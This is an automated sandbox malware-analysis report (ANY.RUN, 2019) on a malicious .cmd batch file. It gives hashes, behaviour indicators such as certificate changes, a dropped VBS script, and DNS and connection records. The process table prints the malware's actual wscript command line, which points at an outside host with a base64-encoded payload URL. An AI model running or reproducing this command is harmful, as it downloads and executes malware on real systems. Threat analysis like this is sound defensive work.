analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Be-kOPmZrE4b1hZ72_cA.cmd

Full analysis: https://app.any.run/tasks/b97027c6-34c4-4da7-9e21-b6ffd70c451e
Verdict: Malicious activity
Analysis date: June 19, 2019, 16:52:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines, with CRLF line terminators
MD5:

34059A0DCD7FF5F42DB49435BF4210C1

SHA1:

7002F75EF2DE1E1D8267E41B60CC4170EDA1ED59

SHA256:

86E1BFAE16AA445206240C9C501369846D43B978D120C60E0CCE755C98FDD2A4

SSDEEP:

48:/G7dI5RtNyyRO+8+wwn08QNn3eO5Mz8n5iq85katzg/g5yZ9z4+XvBwDU94xDhr:55RXz5dg73Yz0F/g5+wqu1r

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2000)
    • Changes settings of System certificates

      • wscript.exe (PID: 2508)
  • SUSPICIOUS

    • Executes scripts

      • cmd.exe (PID: 2000)
    • Creates files in the program directory

      • cmd.exe (PID: 2000)
    • Creates files in the user directory

      • wscript.exe (PID: 2508)
    • Adds / modifies Windows certificates

      • wscript.exe (PID: 2508)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs ping.exe no specs wscript.exe

Process information

PID
CMD
Path
Indicators
Parent process
2000cmd /c ""C:\Users\admin\AppData\Local\Temp\Be-kOPmZrE4b1hZ72_cA.cmd" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1344ping 127.0.0.1 -n 1 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2508wscript //Nologo "C:\ProgramData\.VVVVVjt\admin.vbs" AS111 https://pt-br.ooguy.com/appkcmd/aHR0cHM6Ly9zdG9yYWdlLmdvb2dsZWFwaXMuY29tL2NvbnNvbGVjbG91ZC9mb2xkZXItamgvc2diZ2Q2a3kzOS5ibXAmbm8tcG93ZXI= C:\Windows\system32\wscript.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Version:
5.8.7600.16385
Total events
100
Read events
63
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
24
Unknown types
0

Dropped files

PID
Process
Filename
Type
2000cmd.exeC:\ProgramData\.VVVVVjt\admin.vbstext
MD5:AAFB3FEF09724D896CEAA2D1E4554294
SHA256:B098BA4F64DF89592C6EE7B9C2FC86A6099EEB784D519A2CCF9DC1A93CF51869
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
2
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2508
wscript.exe
54.207.55.139:443
pt-br.ooguy.com
Amazon.com, Inc.
BR
unknown

DNS requests

Domain
IP
Reputation
pt-br.ooguy.com
  • 54.207.55.139
unknown
edzz.la
  • 18.215.105.2
unknown

Threats

No threats detected
No debug info